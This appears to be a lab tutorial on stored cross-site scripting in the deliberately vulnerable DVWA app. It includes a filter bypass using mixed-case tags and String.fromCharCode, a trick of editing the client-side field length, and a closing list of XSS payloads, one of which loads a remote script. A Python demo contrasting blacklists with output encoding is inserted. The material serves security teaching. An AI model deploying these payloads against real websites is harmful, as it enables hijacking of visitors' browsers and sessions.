Stored XSS in DVWA

Refer to the XSS - Cross Site Scripting guide, where I explain what XSS is and the types of XSS.


The difference between Reflected XSS and Stored XSS is that Stored XSS, as its name implies, is stored on the site itself, so anyone who visits the page will see your XSS executed in their browser.

Power on the Metasploitable machine, and get the machine IP.

On the Kali machine, open a browser and go to the Metasploitable IP.

DVWA >> DVWA Security >> Low >> submit

DVWA >> "XSS stored"

xss stored - dvwa

Add your name and a message to see how the website works.

Now if you go to the same URL from a different computer, you will see the same message you typed.

So now, let's inject the payload from one machine / PC.

Once you visit the same website in a different machine, you will get your XSS message.

Your JavaScript is now stored in the website: that is stored XSS.

In the second browser you will see:

xss payload in target browser

Next stage is to change the security level to medium.

But before you do that, you need to reset the DB, since you already have stored XSS in there:

reset database dvwa

Once you reset the DB, change the security to Medium:

DVWA >> DVWA Security >> Medium >> submit

Try to bypass the filter as we did in the Reflected XSS guide and you will see that nothing works.

You need to think of another way to bypass the defenses of the website.

How about the "Name" field?

If you try to inject your script into the "Name" field, you will see that you can't enter more than 10 characters.

To bypass that, open the page source in the browser and change the field's length limit from 10 to 50 or more, then try again, like so:

change field for xss

Change:


Inject:


stored xss in name

The result is:


Some websites filter single or double quotes, so we can try to build the payload from character codes instead, using a site like this:

manipulate the code for xss

To get past the filter here, you need to change the alert payload as well, building the string from character codes and mixing the case of the script tags:

<Script>alert(String.fromCharCode(120, 115, 115, 50, 10))</ScRIpT>

Now if you visit the website from a different machine, you will see the payload you injected, in our example "xss2".
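Why does the mixed-case tag get through while the plain `<script>` tag does not, and why does editing the field's length limit in the browser work at all? The added Python example below (not DVWA's PHP and not code from this walkthrough) models both defences the page bypasses and puts the correct controls beside them: `weak_filter` is a constructed case-sensitive blacklist of the kind that strips only the literal lowercase `<script>`, `GuestBook` is a constructed guest-book model that enforces the 10-character name limit on the server rather than in the browser and HTML-encodes every stored value at render time, and `contains_executable_markup` is a rough demo heuristic, not a real XSS detector. The payload list is constructed from the payloads on this page plus event-handler and `javascript:` URL variants.

```python
"""Stored XSS defence demo: case-sensitive blacklist vs output encoding.

Added example modelled on the DVWA stored XSS walkthrough; all names and
inputs here are constructed for the demo and are not DVWA's own code.
"""
import html

# Constructed inputs: the payloads used on this page and common variants.
PAYLOADS = [
    "<script>alert('xss')</script>",
    "<Script>alert(String.fromCharCode(120, 115, 115, 50, 10))</ScRIpT>",
    '<IMG SRC=# onmouseover="alert(\'xxs\')">',
    '<BODY BACKGROUND="javascript:alert(\'XSS\')">',
]

NAME_MAX_LEN = 10  # the limit the page's form enforces only in the browser


def weak_filter(name: str) -> str:
    """Constructed case-sensitive blacklist: removes the literal lowercase
    '<script>' and nothing else. Mixed case, event handlers and javascript:
    URLs all slip through untouched."""
    return name.replace("<script>", "")


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML text/attribute context: '<', '>', '&'
    and both quote characters become entities, so stored markup is
    displayed as text instead of being parsed."""
    return html.escape(value, quote=True)


def contains_executable_markup(rendered: str) -> bool:
    """Rough demo heuristic (not a real detector): does the rendered HTML
    still contain a raw '<' together with a script tag, an inline event
    handler, or a javascript: URL?"""
    lowered = rendered.lower()
    return "<" in rendered and (
        "<script" in lowered or "onmouseover=" in lowered or "javascript:" in lowered
    )


def compare(payload: str) -> dict:
    """How one payload fares under the blacklist versus output encoding."""
    return {
        "blacklist_executes": contains_executable_markup(weak_filter(payload)),
        "encoded_executes": contains_executable_markup(encode_for_html(payload)),
    }


class GuestBook:
    """Constructed guest-book model: validates on input, encodes on output."""

    def __init__(self):
        self.entries = []  # list of (name, message) stored exactly as submitted

    def submit(self, name: str, message: str) -> bool:
        # Enforce the length limit on the server. The browser-side limit the
        # walkthrough edits in the page source is a usability hint, not a
        # security control, because the client fully controls the request.
        if not name or not message or len(name) > NAME_MAX_LEN:
            return False
        self.entries.append((name, message))
        return True

    def render(self) -> str:
        # Encode every stored value at render time. Storing raw input is fine;
        # the injection happens only if it is written into HTML unencoded.
        rows = [
            f"<tr><td>{encode_for_html(n)}</td><td>{encode_for_html(m)}</td></tr>"
            for n, m in self.entries
        ]
        return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r}: {compare(p)}")
    book = GuestBook()
    print("50-char name accepted?", book.submit("A" * 50, "hello"))
    book.submit("Bob", PAYLOADS[1])
    print(book.render())
```

Running it shows the lowercase `<script>` payload is the only one the blacklist stops, which matches the "nothing works" experience at Medium, while every payload survives the blacklist in some other spelling and none survives output encoding. The take-away for the defender side is the one the walkthrough demonstrates from the attacker side: validate length and format on the server, and neutralize stored content by encoding it for the context it is rendered into rather than by blacklisting tag names.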


Hope you find this information useful.

There are many more script injections on the web for you to explore, such as:

  • <IMG onmouseover="alert('xxs')">

  • <IMG SRC=# onmouseover="alert('xxs')">

  • <SCRIPT SRC=http://xss.rocks/xss.js?< B >

  • <BODY BACKGROUND="javascript:alert('XSS')">

All the guides, tips, and tricks on this website are for educational purposes only; the website owner is not accountable for any use of this information.